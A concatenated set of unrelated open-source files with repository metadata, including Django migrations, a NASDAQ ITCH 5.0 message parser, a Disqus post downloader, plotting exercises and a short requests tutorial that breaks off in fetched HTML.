        # Nothing to interrupt: all handlers complete synchronously.
        pass
def create_skill():
    """Mycroft entry point: return a new instance of this skill."""
    return MyFamilyTreeSkill()
| [
"noreply@github.com"
] | noreply@github.com |
22785d6ec49c706671469a0abffb4c131635c47f | 599bcf2ee1ddfbd8f7057c9ec7c428db11bfc072 | /mainapp/migrations/0006_remove_order_order_data.py | 5bbbbf624a7ad10de7d964ab99a206aa97dde389 | [] | no_license | Tr0612/athinath | 4561e939573ba24c3a014a84884f1387d57e7441 | 760dc244d877c4dfda24de16d08a38c20c5bdbbc | refs/heads/master | 2023-02-23T12:53:46.195529 | 2021-01-28T07:36:23 | 2021-01-28T07:36:23 | 333,438,865 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 321 | py | # Generated by Django 3.1.4 on 2020-12-25 13:11
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated by Django: drops the `order_data` field from the
    # `order` model in the mainapp application.
    dependencies = [
        ('mainapp', '0005_carousel'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='order',
            name='order_data',
        ),
    ]
| [
"Ghost0612@users.noreply.github.com"
] | Ghost0612@users.noreply.github.com |
54534400b18c5e41880fb6c91712b0accbd4e658 | ce3dd61cb00be3ab3b007ccc572e15ebc4624939 | /itch_factory.py | 07ff3c6ca67486be0f68e78b602a0f96c6ef2bef | [
"MIT"
] | permissive | Shutong-Song/nasdaq-ITCH-5.0-parser | 6a8bd704bf8928648490abf3b1a79015ec0ec1d2 | 5fef246625ebd1af6ed073cf37120fef61ca49a2 | refs/heads/master | 2023-03-09T05:01:47.180999 | 2021-03-01T03:00:58 | 2021-03-01T03:00:58 | 181,784,743 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 8,414 | py | import struct
def system_event_message(msg):
    """Parse an ITCH 5.0 System Event ("S") message body.

    ``msg`` holds the 11 bytes that follow the already-consumed message-type
    byte: stock locate (H), tracking number (H), timestamp (6s), event code (c).

    Returns [stock_locate, tracking_number, timestamp, event_code].
    Raises struct.error if ``msg`` is not exactly 11 bytes.
    """
    # struct.unpack either raises or returns exactly one value per format
    # field, so the original ``if len(val) == 4`` guard was dead code.
    return list(struct.unpack('!HH6sc', msg))
def stock_directory_message(msg):
    # Stock Directory ("R") body: stock locate, tracking number, timestamp,
    # stock, market category, financial status indicator, round lot size,
    # round lots only, issue classification, issue subtype, authenticity,
    # short-sale threshold indicator, IPO flag, LULD reference price tier,
    # ETP flag, ETP leverage factor, inverse indicator.
    val = struct.unpack('!HH6s8sccIcc2scccccIc',msg);
    val = list(val);
    if len(val) == 16:
        return val
    else:
        # Unreachable: unpack raises on a size mismatch and otherwise
        # always returns exactly 16 fields.
        return []
def stock_trading_action(msg):
    # Stock Trading Action ("H") body: stock locate, tracking number,
    # timestamp, stock, trading state, reserved byte, reason.
    val = struct.unpack('!HH6s8scc4s',msg);
    val = list(val);
    if len(val) == 7:
        return val
    else:
        # Unreachable (see stock_directory_message).
        return []
def short_sale_price_test(msg):
    # Reg SHO Short Sale Price Test Restriction ("Y") body: stock locate,
    # tracking number, timestamp, stock, Reg SHO action.
    val = struct.unpack('!HH6s8sc',msg);
    val = list(val);
    if len(val) == 5:
        return val
    else:
        # Unreachable (see stock_directory_message).
        return []
def market_participation_position(msg):
    # Market Participant Position ("L") body: stock locate, tracking number,
    # timestamp, MPID, stock, primary market maker flag, market maker mode,
    # market participant state.
    val = struct.unpack('!HH6s4s8sccc',msg);
    val = list(val);
    if len(val) == 8:
        return val
    else:
        # Unreachable (see stock_directory_message).
        return []
def mwcb_decline_level_message(msg):
    """Parse an ITCH 5.0 MWCB Decline Level ("V") message body.

    Returns [stock_locate, tracking_number, timestamp, level1, level2, level3]
    with the three circuit-breaker levels converted from Price(8) fixed-point
    (8 implied decimal places) to float.
    Raises struct.error if ``msg`` is not exactly 34 bytes.
    """
    val = list(struct.unpack('!HH6sQQQ', msg))
    # One pass replaces the original double map (float() then divide):
    # true division of an int already yields a float.
    val[3:] = [x / 10**8 for x in val[3:]]
    return val
def mwcb_status_message(msg):
    # MWCB Status ("W") body: stock locate, tracking number, timestamp,
    # breached level.
    val = struct.unpack('!HH6sc',msg);
    val = list(val);
    if len(val) == 4:
        return val
    else:
        # Unreachable: unpack raises on a size mismatch and otherwise
        # returns exactly 4 fields.
        return []
def ipo_quoting_period_update(msg):
    # IPO Quoting Period Update ("K") body: stock locate, tracking number,
    # timestamp, stock, IPO quotation release time, release qualifier,
    # IPO price (Price(4): 4 implied decimal places, converted to float).
    val = struct.unpack('!HH6s8sIcL',msg);
    val = list(val);
    val[6] = float(val[6]);
    val[6] = val[6]/10000;
    if len(val) == 7:
        return val
    else:
        # Unreachable (see mwcb_status_message).
        return []
def LULD_Auction_Collar(msg):
    # LULD Auction Collar ("J") body: stock locate, tracking number,
    # timestamp, stock, collar reference price, upper collar price,
    # lower collar price (all Price(4) -> float), collar extension count.
    val = struct.unpack('!HH6s8sLLLI',msg);
    val = list(val);
    val[4:7] = map(float,val[4:7]);
    val[4:7] = map(lambda x:x/10000,val[4:7]);
    if len(val) == 8:
        return val
    else:
        # Unreachable (see mwcb_status_message).
        return []
def Operational_Halt(msg):
    # Operational Halt ("h") body: stock locate, tracking number, timestamp,
    # stock, market code, operational halt action.  No price field to scale.
    val = struct.unpack('!HH6s8scc',msg);
    val = list(val);
    #val[8] = float(val[8]);
    #val[8] = val[8]/10000;
    if len(val) == 6:
        return val
    else:
        # Unreachable (see mwcb_status_message).
        return []
def add_order_message(msg):
    """Parse an ITCH 5.0 Add Order - No MPID ("A") message body.

    Returns [stock_locate, tracking_number, timestamp, order_reference,
    buy_sell_indicator, shares, stock, price] where price is converted
    from Price(4) fixed-point (4 implied decimal places) to float.
    Raises struct.error if ``msg`` is not exactly 35 bytes.
    """
    val = list(struct.unpack('!HH6sQcI8sL', msg))
    # True division already produces a float; the old float() call and the
    # always-true length guard were redundant.
    val[7] = val[7] / 10000
    return val
def add_order_with_mpid(msg):
    # Add Order with MPID ("F") body: stock locate, tracking number,
    # timestamp, order reference number, buy/sell indicator, shares, stock,
    # price (Price(4) -> float), attribution (MPID).
    val = struct.unpack('!HH6sQcI8sL4s',msg);
    val = list(val);
    val[7] = float(val[7]);
    val[7] = val[7]/10000;
    if len(val) == 9:
        return val
    else:
        # Unreachable: unpack raises on a size mismatch and otherwise
        # returns exactly 9 fields.
        return []
def order_executed_message(msg):
    """Parse an ITCH 5.0 Order Executed ("E") message body.

    Returns [stock_locate, tracking_number, timestamp, order_reference,
    executed_shares, match_number].
    Raises struct.error if ``msg`` is not exactly 30 bytes.
    """
    # unpack yields exactly six fields or raises, so the old
    # ``len(val) == 6`` guard was dead code.
    return list(struct.unpack('!HH6sQIQ', msg))
def order_executed_price_message(msg):
    # Order Executed With Price ("C") body: stock locate, tracking number,
    # timestamp, order reference number, executed shares, match number,
    # printable flag, execution price (Price(4) -> float).
    val = struct.unpack('!HH6sQIQcL',msg);
    val = list(val);
    val[7] = float(val[7]);
    val[7] = val[7]/10000;
    if len(val) == 8:
        return val
    else:
        # Unreachable: unpack raises on a size mismatch and otherwise
        # returns exactly 8 fields.
        return []
def order_cancel_message(msg):
    # Order Cancel ("X") body: stock locate, tracking number, timestamp,
    # order reference number, cancelled shares.
    val = struct.unpack('!HH6sQI',msg);
    val = list(val);
    if len(val) == 5:
        return val
    else:
        # Unreachable (see order_executed_price_message).
        return []
def order_delete_message(msg):
    # Order Delete ("D") body: stock locate, tracking number, timestamp,
    # order reference number.
    val = struct.unpack('!HH6sQ',msg);
    val = list(val);
    if len(val) == 4:
        return val
    else:
        # Unreachable (see order_executed_price_message).
        return []
def order_replace_message(msg):
    # Order Replace ("U") body: stock locate, tracking number, timestamp,
    # original order reference, new order reference, shares,
    # price (Price(4) -> float).
    val = struct.unpack('!HH6sQQIL',msg);
    val = list(val);
    val[6] = float(val[6]);
    val[6] = val[6]/10000;
    if len(val) == 7:
        return val
    else:
        # Unreachable (see order_executed_price_message).
        return []
def trade_message(msg):
    # Trade (non-cross, "P") body: stock locate, tracking number, timestamp,
    # order reference number, buy/sell indicator, shares, stock,
    # price (Price(4) -> float), match number.
    val = struct.unpack('!HH6sQcI8sLQ',msg);
    val = list(val);
    val[7] = float(val[7]);
    val[7] = val[7]/10000;
    if len(val) == 9:
        return val
    else:
        # Unreachable: unpack raises on a size mismatch and otherwise
        # returns exactly 9 fields.
        return []
def cross_trade_message(msg):
    # Cross Trade ("Q") body: stock locate, tracking number, timestamp,
    # shares, stock, cross price (Price(4) -> float), match number,
    # cross type.
    val = struct.unpack('!HH6sQ8sLQc',msg);
    val = list(val);
    val[5] = float(val[5]);
    val[5] = val[5]/10000;
    if len(val) == 8:
        return val
    else:
        # Unreachable (see trade_message).
        return []
def broken_trade_execution_message(msg):
    # Broken Trade / Order Execution ("B") body: stock locate,
    # tracking number, timestamp, match number.
    val = struct.unpack('!HH6sQ',msg);
    val = list(val);
    if len(val) == 4:
        return val
    else:
        # Unreachable (see trade_message).
        return []
def net_order_imbalance_message(msg):
    # Net Order Imbalance Indicator ("I") body: stock locate,
    # tracking number, timestamp, paired shares, imbalance shares,
    # imbalance direction, stock, far price, near price, current reference
    # price (all three Price(4) -> float), cross type, price variation
    # indicator.
    val = struct.unpack('!HH6sQQc8sLLLcc',msg);
    val = list(val);
    val[7:10] = map(float,val[7:10]);
    val[7:10] = map(lambda x:x/10000,val[7:10]);
    if len(val) == 12:
        return val
    else:
        # Unreachable (see trade_message).
        return []
| [
"simonsong004@gmail.com"
] | simonsong004@gmail.com |
9f0657298cc0520dbbf6f88dd654749d22acc7d9 | 88b0f614c91af8c00c2a132157cfd665dded48b1 | /python/api/disqus_posts.py | d8442b2866356e8917fae38c0fcf517203e7088f | [] | no_license | lemurproject/clueweb12pp-core | 74567939fd3066dbb461de106336ed513d2d6c7e | 3f083e71838c9c3c7067d5ec137592b852d912a0 | refs/heads/master | 2016-09-05T10:15:57.081189 | 2013-08-20T17:51:35 | 2013-08-20T17:51:35 | 10,918,647 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,338 | py | '''
Disqus posts download
'''
import argparse
import gzip
import json
import sys
import time
import traceback
from disqusapi import DisqusAPI, Paginator, APIError
# Default log of thread ids whose download failed.  NOTE(review): the file
# is opened at import time; __main__ rebinds both names from --failed-ids.
FAILED_IDS = 'disqus_failed_posts.txt'
FAILED_IDS_HANDLE = open(FAILED_IDS, 'a+')
def load_downloaded_ids(downloaded):
    """Return the set of already-downloaded thread ids listed in *downloaded*.

    Each line of the file is one id; surrounding whitespace is stripped.
    """
    with open(downloaded, 'r') as handle:
        return {line.strip() for line in handle}
def process_disqus_file(disqus_file, downloaded_file = None):
'''
process file
'''
downloaded_ids = load_downloaded_ids(downloaded_file)
f = gzip.open(disqus_file, 'r')
while True:
new_line = f.readline()
if not new_line:
return
parsed = json.loads(new_line)
if parsed['posts'] > 0:
if not parsed['id'] in downloaded_ids:
print parsed['id']
sys.stdout.flush()
def save_disqus_posts(ids_file, destination, api):
    '''
    Download all posts for every thread id listed (one per line) in
    *ids_file*, appending the JSON results to the gzipped *destination*.
    Successfully fetched ids go to stdout, failures to stderr.
    Each id is retried up to 10 times.
    '''
    # NOTE(review): f is not closed if an exception escapes the loop.
    f = gzip.open(destination, 'ab')
    with open(ids_file, 'r') as ids_stream:
        for new_id in ids_stream:
            success = False
            for _ in range(10):
                try:
                    save_disqus_posts_for_thread(new_id.strip(), f, api)
                    success = True
                    break
                except APIError as err:
                    # API error code 2 means the forum/thread does not
                    # exist, so retrying is pointless -- skip this attempt.
                    if err.code == 2:
                        #sys.stderr.write(new_id)
                        continue # forum doesn't exist so just iterate out
                    # Otherwise assume rate limiting: the API gives no
                    # retry-after, so wait a flat 2000 seconds and retry.
                    sys.stderr.write('INFO: APIError' + '\n')
                    traceback.print_stack()
                    time.sleep(2000)
                    continue
                except:
                    # Deliberate catch-all: any transient failure (network,
                    # JSON, etc.) just burns one of the 10 retries.
                    continue
            if success:
                print new_id.strip()
                sys.stdout.flush()
            else:
                sys.stderr.write(new_id.strip() + '\n')
    f.close()
def save_disqus_posts_for_thread(thread_id, destination_handle, api):
    # Page through every post of the thread and append each page of results
    # to destination_handle as one JSON document per line.
    paginator = Paginator(api.threads.listPosts, thread = thread_id)
    for result in paginator():
        destination_handle.write(json.dumps(result) + '\n')
if __name__ == '__main__':
    # Two mutually exclusive modes: -d/--dump-ids prints thread ids worth
    # downloading; -s/--save-posts downloads the posts for a list of ids.
    def parse_cmdline_args():
        parser = argparse.ArgumentParser()
        parser.add_argument('--secret-key', dest = 'secret_key')
        parser.add_argument('--public-key', dest = 'public_key')
        parser.add_argument('-d', '--dump-ids', dest = 'dump_ids', default = [], nargs = '+', help = 'Pass in a posts.gz file for us to obtain a list of posts')
        parser.add_argument('-s', '--save-posts', dest = 'save_posts', default = None, help = 'Pass in a list of ids and we download the posts')
        parser.add_argument('--destination', dest = 'destination', help = 'Where to store the resulting posts. Name must end in .gz')
        parser.add_argument('--downloaded', dest = 'downloaded', default = None, help = 'Log file of previous download. We use this to sift out already downloaded ids')
        parser.add_argument('--failed-ids', dest = 'failed_ids', default = None, help = 'Store ids that failed')
        return parser.parse_args()
    parsed = parse_cmdline_args()
    if parsed.dump_ids:
        for filename in parsed.dump_ids:
            process_disqus_file(filename, parsed.downloaded)
    elif parsed.save_posts:
        # Rebind the module-level failure log to the user-supplied path.
        FAILED_IDS = parsed.failed_ids
        FAILED_IDS_HANDLE = open(FAILED_IDS, 'a+')
        #sys.stderr = FAILED_IDS_HANDLE
        api = DisqusAPI(parsed.secret_key, parsed.public_key)
        save_disqus_posts(parsed.save_posts, parsed.destination, api)
"shriphanip@gmail.com"
] | shriphanip@gmail.com |
ae67f1d6bb50b24ac15c333c79ab4b25c82918c0 | 41ddf80398589255c1de3316667505802aadbdcb | /Week 7 Assignment.py | 5bc60bb9fbde5558b4b287a3e450fcc77a82bdce | [] | no_license | Khaninder/Data-Viz | a6fa764230684c7432184783e0a818cc337863ae | fabc6f8bdb5cf5e960390db871f6127b4e64c609 | refs/heads/master | 2022-04-17T18:30:34.195839 | 2020-04-10T01:10:50 | 2020-04-10T01:10:50 | 250,364,850 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,776 | py | #!/usr/bin/env python
# coding: utf-8
# Jupyter-notebook export: matplotlib/seaborn/pandas/plotly plotting
# exercises.  The ``# In[NN]:`` markers are the original notebook cells;
# get_ipython() magics only work when run inside IPython/Jupyter.
# In[23]:
import numpy as np
import pandas as pd
# In[10]:
import matplotlib.pyplot as plt
# In[19]:
# --- Scatter plot: iced-coffee sales vs temperature ---
get_ipython().run_line_magic('matplotlib', 'inline')
plt.style.use('seaborn-whitegrid')
X = [590,540,740,130,810,300,320,230,470,620,770,250]
Y = [32,36,39,52,61,72,77,75,68,57,48,48]
plt.scatter(X,Y)
plt.xlim(0,1000)
plt.ylim(0,100)
#scatter plot color
plt.scatter(X, Y, s=60, c='red', marker='^')
#change axes ranges
plt.xlim(0,1000)
plt.ylim(0,100)
#add title
plt.title('Relationship Between Temperature and Iced Coffee Sales')
#add x and y labels
plt.xlabel('Sold Coffee')
plt.ylabel('Temperature in Fahrenheit')
#show plot
plt.show()
# In[20]:
# --- Line plot of sin/cos on an empty figure/axes ---
get_ipython().run_line_magic('matplotlib', 'inline')
import matplotlib.pyplot as plt
import numpy as np
plt.style.use('seaborn-whitegrid')
#Create empty figure
fig=plt.figure()
ax=plt.axes()
x=np.linspace(0,10,1000)
ax.plot(x, np.sin(x));
plt.plot(x, np.sin(x))
plt.plot(x, np.cos(x))
# set the x and y axis range
plt.xlim(0, 11)
plt.ylim(-2, 2)
plt.axis('tight')
#add title
plt.title('Plotting data using sin and cos')
# In[26]:
# --- Seaborn distribution / KDE / joint / pair plots on random data ---
import matplotlib.pyplot as plt
get_ipython().run_line_magic('matplotlib', 'inline')
import numpy as np
import pandas as pd
import seaborn as sns
plt.style.use('classic')
plt.style.use('seaborn-whitegrid')
# Create some data
data = np.random.multivariate_normal([0, 0], [[5, 2], [2, 2]], size=2000)
data = pd.DataFrame(data, columns=['x', 'y'])
# Plot the data with seaborn
sns.distplot(data['x'])
sns.distplot(data['y']);
# In[27]:
for col in 'xy':
    sns.kdeplot(data[col], shade=True)
# In[28]:
sns.kdeplot(data);
# In[29]:
with sns.axes_style('white'):
    sns.jointplot("x", "y", data, kind='kde');
# In[30]:
with sns.axes_style('white'):
    sns.jointplot("x", "y", data, kind='hex')
# In[31]:
sns.pairplot(data);
# In[77]:
# --- Offline plotly example ---
import plotly.offline as offline
import plotly.graph_objs as go
offline.plot({'data': [{'y': [14, 22, 30, 44]}],'layout': {'title': 'Offline Plotly', 'font':dict(size=16)}}, image='png')
# In[76]:
# --- pandas built-in plotting: line, bar, barh, hist, box, area, scatter ---
import pandas as pd
import numpy as np
df = pd.DataFrame(np.random.randn(200,6),index= pd.date_range('1/9/2009', periods=200), columns= list('ABCDEF'))
df.plot(figsize=(20, 10)).legend(bbox_to_anchor=(1, 1))
# In[74]:
import pandas as pd
import numpy as np
df = pd.DataFrame(np.random.rand(20,5), columns=['Jan','Feb', 'March','April', 'May'])
df.plot.bar(figsize=(20, 10)).legend(bbox_to_anchor=(1.1, 1))
# In[73]:
import pandas as pd
df = pd.DataFrame(np.random.rand(20,5), columns=['Jan','Feb', 'March','April', 'May'])
df.plot.bar(stacked=True, figsize=(20, 10)).legend(bbox_to_anchor=(1.1, 1))
# In[72]:
import pandas as pd
df = pd.DataFrame(np.random.rand(20,5), columns=['Jan','Feb', 'March','April', 'May'])
df.plot.barh(stacked=True, figsize=(20, 10)).legend(bbox_to_anchor=(1.1, 1))
# In[71]:
import pandas as pd
df = pd.DataFrame(np.random.rand(20,5), columns=['Jan','Feb', 'March','April', 'May'])
df.plot.hist(bins= 20, figsize=(10,8)).legend(bbox_to_anchor=(1.2,1))
# In[67]:
import pandas as pd
import numpy as np
df=pd.DataFrame({'April':np.random.randn(1000)+1,'May':np.random. randn(1000),'June': np.random.randn(1000) - 1}, columns=['April',
'May', 'June'])
df.hist(bins=20)
# In[66]:
import pandas as pd
import numpy as np
df = pd.DataFrame(np.random.rand(20,5), columns=['Jan','Feb','March','April', 'May'])
df.plot.box()
# In[65]:
import pandas as pd
import numpy as np
df = pd.DataFrame(np.random.rand(20,5), columns= ['Jan','Feb','March','April', 'May'])
df.plot.area(figsize=(6, 4)).legend (bbox_to_anchor=(1.3, 1))
# In[64]:
import pandas as pd
import numpy as np
df = pd.DataFrame(np.random.rand(20,5),columns= ['Jan','Feb', 'March','April', 'May'])
df.plot.scatter(x='Feb', y='Jan', title='Temperature over two months ')
# In[41]:
# --- Sales data indexed by salesman name, plotted several ways ---
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
salesMen = ['Ahmed', 'Omar', 'Ali', 'Ziad', 'Salwa', 'Lila']
Mobile_Sales = [2540, 1370, 1320, 2000, 2100, 2150]
TV_Sales = [2200, 1900, 2150, 1850, 1770, 2000]
df = pd.DataFrame()
df ['Name'] =salesMen
df ['Mobile_Sales'] = Mobile_Sales
df['TV_Sales']=TV_Sales
df.set_index("Name",drop=True,inplace=True)
# In[42]:
df
# In[55]:
df.plot.bar( figsize=(20, 10), rot=0).legend(bbox_to_anchor=(1.2, 1))
plt.xlabel('Salesmen')
plt.ylabel('Sales')
plt.title('Sales Volume for two salesmen in \nJanuary and April 2017')
plt.show()
# In[58]:
df.plot.pie(subplots=True)
# In[50]:
df.plot.box()
# In[52]:
df.plot.area(figsize=(6,4)).legend(bbox_to_anchor=(1.5,1))
# In[63]:
df.plot.bar(stacked=True, figsize=(20, 10)).legend(bbox_to_anchor=(1.4, 1))
| [
"noreply@github.com"
] | noreply@github.com |
dbd5cecff92cba1fcf35215102752961f33b4718 | ce74ed4ad6834168b81d6ec5e53c80935f247fe1 | /python-wrapper/normalizer.py | 260c4e083f822c223ff64a447d4b415a33455417 | [] | no_license | chenghuige/melt | 6b6984243c71a85ec343cfaa67a66e3d1b48c180 | d2646ffe84eabab464b4bef6b31d218abdbf6ce5 | refs/heads/master | 2021-01-25T16:46:57.567890 | 2017-08-26T04:30:13 | 2017-08-26T04:30:13 | 101,304,210 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,386 | py | import os
import sys
import glob
from pyplusplus import module_builder
# pyplusplus (Py++) build script: runs gccxml over the Normalizer headers
# and generates Boost.Python binding source 'normalizer_py.cc' for a module
# named 'libnormalizer'.  Paths are specific to the author's build tree.
root = '/home/users/chenghuige/rsc/'
name = 'normalizer'
#define_symbols = ['GCCXML','PYTHON_WRAPPER','NO_BAIDU_DEP']
define_symbols = ['GCCXML','PYTHON_WRAPPER']
# Headers to expose to Python.
files = [
  './gezi.include.python/common_util.h',
  './gezi.include.python/log_util.h',
  './include.python/Prediction/Normalization/Normalizer.h',
  './include.python/Prediction/Normalization/NormalizerFactory.h',
  './gezi.include.python/Numeric/Vector/Vector.h',
  ]
paths = [
  #'./gezi.include.python/Numeric/Vector/',
  #'./include.python/MLCore/',
  #'./include.python/Prediction/Instances/',
  ]
#import gezi
#for path in paths:
# files += [f for f in gezi.get_filepaths(path) if f.endswith('.h')]
# Include roots, relative to ``root``; the three lists get different
# suffixes ('/include', '/include.python', none) when joined below.
include_paths=[
  'third-64/glog',
  'third-64/gflags',
  'third-64/gtest',
  'third-64/boost.1.53',
  'lib2-64/bsl',
  'lib2-64/postag',
  'lib2-64/dict',
  'lib2-64/libcrf',
  'lib2-64/others-ex',
  'lib2-64/ullib',
  'lib2-64/ccode',
  'public/odict/output',
  'public/uconv/output',
  'public/configure/output',
  'app/search/sep/anti-spam/gezi/third/rabit',
  ]
include_paths_python = [
  'app/search/sep/anti-spam/melt/python-wrapper',
  ]
include_paths_obsolute = [
  'app/search/sep/anti-spam/melt/python-wrapper/gezi.include.python',
  'lib2-64/wordseg',
  'public/comlog-plugin',
  'app/search/sep/anti-spam/gezi/third',
  ]
mb = module_builder.module_builder_t(
  gccxml_path = '~/.jumbo/bin/gccxml',
  define_symbols = define_symbols,
  files = files,
  include_paths = [root + f + '/include' for f in include_paths]
  + [root + f + '/include.python' for f in include_paths_python]
  + [root + f for f in include_paths_obsolute]
  )
mb.build_code_creator( module_name='lib%s'%name )
mb.code_creator.user_defined_directories.append( os.path.abspath('.') )
mb.write_module( os.path.join( os.path.abspath('./'), '%s_py.cc'%name) )
| [
"chenghuige@fa64baa9-71d1-4fed-97ae-c15534abce97"
] | chenghuige@fa64baa9-71d1-4fed-97ae-c15534abce97 |
78f471f0902f14f995748f3ef4ffec01dceac880 | 44befe00cc663d36556876a336f583e17d6c4d24 | /python_review/2_max_in_list_2.py | 5c82d61616761aa477dd399b287f21b5644e6211 | [] | no_license | HannahYH/Python | 3d636a7cfdc399bafadf26b27972184f7a428a32 | fdca2f2f141856d9f7384e7de5ad050104bb8975 | refs/heads/master | 2020-03-27T15:49:39.462251 | 2019-12-11T09:18:11 | 2019-12-11T09:18:11 | 146,742,129 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,101 | py | from random import seed, randint
# Prompts the user for a seed for the random number generator,
# and for a strictly positive number, nb_of_elements.
import sys  # fix: sys.exit() is called below but sys was never imported

arg_for_seed = input('Input a seed for the random number generator: ')
try:
    arg_for_seed = int(arg_for_seed)
except ValueError:
    print('Input is not an integer, giving up.')
    sys.exit()
nb_of_elements = input('How many elements do you want to generate? ')
try:
    nb_of_elements = int(nb_of_elements)
except ValueError:
    print('Input is not an integer, giving up.')
    sys.exit()
if nb_of_elements <= 0:
    print('Input should be strictly positive, giving up.')
    sys.exit()
# Generates a list of nb_of_elements random integers between 0 and 99.
seed(arg_for_seed)
L = [randint(0, 99) for _ in range(nb_of_elements)]
# Prints out the list, computes the maximum element of the list, and prints it out.
print('\nThe list is:', L)
# Manual max/min scan, printed next to the built-ins for comparison.
max_num = L[0]
min_num = L[0]
for item in L:
    if item > max_num:
        max_num = item
    if item < min_num:
        min_num = item
print(max_num, max(L))
print(max_num-min_num, max(L)-min(L))
| [
"noreply@github.com"
] | noreply@github.com |
2df3f8b7738ac707606738926f6e0f3cb24f0154 | 4fc1d1097ac124d0dcbb9c1e574efec5c38105d8 | /staff/migrations/0001_initial.py | 90b968534d808291b151eba7b45cc526e3b91f5a | [] | no_license | lilianwaweru/management | 077d3261e1f8bd5d6c84a0b40edd28249410279f | e71bd0b67266ca8715605574e52c81137a66eaeb | refs/heads/master | 2020-12-23T14:09:49.630171 | 2020-03-02T12:34:06 | 2020-03-02T12:34:06 | 237,173,611 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,659 | py | # Generated by Django 3.0.3 on 2020-03-02 11:14
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated initial migration: creates the ``Work`` model holding
    an employee's personal, education and work-history details.
    (Field name 'secondary_shool' is a typo preserved in the schema.)"""
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Work',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('image', models.ImageField(blank=True, upload_to='images/')),
                ('first_name', models.CharField(max_length=30)),
                ('other_names', models.CharField(max_length=30)),
                ('department', models.CharField(max_length=30)),
                ('employee_number', models.IntegerField()),
                ('identification_number', models.IntegerField()),
                ('nssf_number', models.IntegerField()),
                ('nhif_number', models.IntegerField()),
                ('date_of_birth', models.DateField()),
                ('employee_position', models.CharField(max_length=30)),
                ('secondary_shool', models.CharField(max_length=100)),
                ('higher_education', models.CharField(max_length=100)),
                ('level_of_education', models.CharField(max_length=100)),
                ('course', models.CharField(max_length=100)),
                ('other_certificates', models.CharField(max_length=100)),
                ('company', models.CharField(max_length=100)),
                ('position', models.CharField(max_length=100)),
                ('duration', models.IntegerField()),
                ('tasks', models.CharField(max_length=1000)),
            ],
        ),
    ]
| [
"lilowesh.lw@gmail.com"
] | lilowesh.lw@gmail.com |
cabe6d29493ca641fcbe6e51d90fbb4d94f131c4 | a0062e2432c7ca908460ae59d3666f1c5c03fec7 | /20200805/Problema5.py | 5deb76957142c01a93aee84696201cd8906d8ee7 | [] | no_license | jonasmzsouza/fiap-tdsr-ctup | e9df6333c5407a8b4937e490b301e821d1f6f89e | 79fae7348a871951368368a8a126b00c22b709ca | refs/heads/master | 2022-12-29T04:17:01.182706 | 2020-10-19T15:32:00 | 2020-10-19T15:32:00 | 248,126,623 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 345 | py | # Lista.pdf
# Problema 5
# Crie uma função em Python que recebe uma lista contendo números inteiros
# e aumente todos os valores da lista em uma unidade.
def aumenta(lista):
    """Increment every element of *lista* by one, in place."""
    for indice in range(len(lista)):
        lista[indice] += 1
# Quick manual check: should print each value increased by one.
listaTeste = [1, 3, 6, 9, 12, 15, 18, 21]
aumenta(listaTeste)
print(listaTeste)
"ev.jonasmuniz@gmail.com"
] | ev.jonasmuniz@gmail.com |
0e5c2f08572df65160cf0040294875735675b65c | ce78a21f86faf0b9783b4cbc1df1fc562e80a2d8 | /Public/problem/D1/2070.큰놈,작은놈,같은놈.py | 94f01b7703da6229722d2d9bd4b809bf0e98293d | [] | no_license | jongjunpark/TIL | 18961c6518f78c8e3d80677f39caf32c727c5beb | 28f4d83e28851aac2dee4e77321543f1c811cc83 | refs/heads/master | 2023-03-17T01:45:51.867005 | 2022-10-31T10:44:05 | 2022-10-31T10:44:05 | 245,943,735 | 1 | 0 | null | 2023-03-05T17:15:39 | 2020-03-09T04:28:06 | Python | UTF-8 | Python | false | false | 260 | py | T = int(input())
# For each of the T test cases (T read from stdin above), read two integers
# and print which comparison relation holds between them.
for t in range(1,T+1):
    numbers = list(map(int,input().split()))
    if numbers[0] > numbers[1]:
        print("#{} >".format(t))
    elif numbers[0] == numbers[1]:
        print("#{} =".format(t))
    else:
        print("#{} <".format(t))
"poiufgin7373@naver.com"
] | poiufgin7373@naver.com |
f81be5ea05f4ea49f85bd863cbbd7e280fde0fa5 | 98e1716c1c3d071b2fedef0ac029eb410f55762c | /part6-import-webdata/No06-Performing-HTTP-requests-in-Python-using-requests.py | e58c16b5e4fa92f0aab1b600c1952cfbd1c58eaa | [] | no_license | iamashu/Data-Camp-exercise-PythonTrack | 564531bcf1dff119949cbb75e1fd63d89cb2779f | c72a4e806494f0e263ced9594597dc8882c2131c | refs/heads/master | 2020-07-22T00:23:12.024386 | 2019-04-12T09:24:42 | 2019-04-12T09:24:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,423 | py | #Performing HTTP requests in Python using requests
'''
Now that you've got your head and hands around making HTTP requests using the
urllib package, you're going to figure out how to do the same using the higher-level requests library. You'll once again be pinging DataCamp servers for their "http://www.datacamp.com/teach/documentation" page.
Note that unlike in the previous exercises using urllib, you don't have to close the connection when using requests!
#Instructions
100 XP
Import the package requests.
Assign the URL of interest to the variable url.
Package the request to the URL, send the request and catch the response with a single function requests.get(), assigning the response to the variable r.
Use the text attribute of the object r to return the HTML of the webpage as a string; store the result in a variable text.
Hit submit to print the HTML of the webpage.
'''
# Code
# Fetch the page with requests; unlike urllib, the connection does not
# need to be closed explicitly.
#from urllib.request import Requests Error: not this lib
import requests
# Specify the url: url
url="http://www.datacamp.com/teach/documentation"
# Packages the request, send the request and catch the response: r
r=requests.get(url) #not Requests(url) And don't need to be closed
# Extract the response: text  (the response body decoded as a string)
text=r.text
# Print the html
print(text)
'''result: the format is differeent from the previous one
<!doctype html>
<html lang="en" data-direction="ltr">
<head>
<link href="https://fonts.intercomcdn.com" rel="preconnect" crossorigin>
